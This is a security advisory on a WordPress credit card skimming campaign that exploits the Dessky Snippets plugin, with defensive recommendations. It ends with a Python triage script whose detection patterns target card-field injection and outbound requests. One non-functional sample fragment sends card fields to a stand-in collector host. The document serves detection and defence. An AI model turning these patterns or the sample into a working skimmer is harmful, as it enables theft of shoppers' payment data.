
Overview

On May 11, 2024, Sucuri identified a newly observed credit card data harvesting campaign. The skimming campaign is exploiting a vulnerability in the Dessky Snippets WordPress plugin to steal financial data from e-commerce websites.

Details of the Exploit:

  • Targeted Plugin: ‘Dessky Snippets’ (Over 200 active installations)
  • Malware Functionality: Attackers implant a server-side PHP credit card skimming malware into compromised sites, enabling the theft of financial data.
  • Malicious Code: The code is saved in the dnsp_settings option in the WordPress wp_options table and modifies the WooCommerce checkout process by injecting its own code into the billing form. This manipulation involves the addition of new fields to the billing form to request comprehensive credit card details, which are subsequently forwarded to a malicious URL. 
  • Impact: Theft of credit card details entered during checkout on WooCommerce websites.

Attack Methodology

  • Initial Access: Gained through known vulnerabilities in WordPress or easily guessable credentials.
  • Post-Exploitation Actions: Attackers install additional plugins, both legitimate and malicious, similar to the one exploited in this campaign.
  • Obfuscation Techniques: The counterfeit checkout form disables the autocomplete attribute. This reduces the likelihood of the user’s browser alerting them to the entry of sensitive information, lowering user suspicion.

Recommendations:

  • Update Sites and Plugins: WordPress site owners, particularly those with E-Commerce functionalities, are advised to update their sites and plugins to the latest versions.
  • Use Robust Passwords: Employ strong, unique passwords to prevent brute force attacks.
  • Regular Monitoring: Routinely check sites for any unauthorised modifications or signs of malware.

By taking these actions, WordPress site owners can better protect their sites from this emerging threat and safeguard their users’ financial data.
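
As an added example for the monitoring recommendation (not code from Sucuri or the plugin), the Python sketch below triages the text of the dnsp_settings option, assumed to be exported beforehand, for instance with WP-CLI's `wp option get`. The regexes, the sample fragments and the host names shop.example and collector.invalid are assumptions constructed for illustration, not published indicators.

```python
import re
from urllib.parse import urlparse

# Indicator groups map to behaviours the advisory describes; the regexes
# themselves are assumptions chosen for this example, not published IoCs.
INDICATORS = {
    "checkout_hook": re.compile(r"woocommerce_(billing|checkout)_\w+", re.I),
    "card_field": re.compile(r"card[_\s-]?(number|num|cvv|cvc|exp\w*)|\bcvv\b|\bcvc\b", re.I),
    "autocomplete_off": re.compile(r"autocomplete['\"]?\s*(=>|=|:)\s*['\"]?off", re.I),
    "outbound_request": re.compile(
        r"\b(wp_remote_(post|get|request)|curl_(init|exec)|fsockopen)\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"\\)<>]+", re.I)


def triage_option(value, allowed_hosts):
    """Classify a raw dnsp_settings value as 'clean', 'review' or 'suspicious'."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(value))
    hosts = {urlparse(u).hostname for u in URL_RE.findall(value)}
    external = sorted(h for h in hosts if h and h.lower() not in allowed_hosts)
    # A snippet plugin legitimately stores PHP, so one indicator alone only
    # warrants review. The combination the advisory describes (checkout hook,
    # card-data fields or autocomplete tampering, and an outbound destination)
    # is what escalates the verdict.
    touches_checkout = "checkout_hook" in hits
    collects_cards = "card_field" in hits or "autocomplete_off" in hits
    sends_out = "outbound_request" in hits or bool(external)
    if touches_checkout and collects_cards and sends_out:
        verdict = "suspicious"
    elif hits or external:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": hits, "external_hosts": external}


# Constructed, non-functional fragments standing in for exported option values.
SAMPLE_SUSPICIOUS = (
    "add_filter('woocommerce_billing_fields', ...); "
    "'billing_card_number' => array('autocomplete' => 'off'), ... "
    "wp_remote_post('https://collector.invalid/c', ...);"
)
SAMPLE_BENIGN = "add_filter('woocommerce_billing_fields', 'drop_company_field');"

if __name__ == "__main__":
    own = {"shop.example"}
    for label, value in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, triage_option(value, own))
```

A "review" verdict means a human should read the stored snippet; only the combined pattern is escalated, because a snippet plugin is expected to hold PHP that touches checkout hooks.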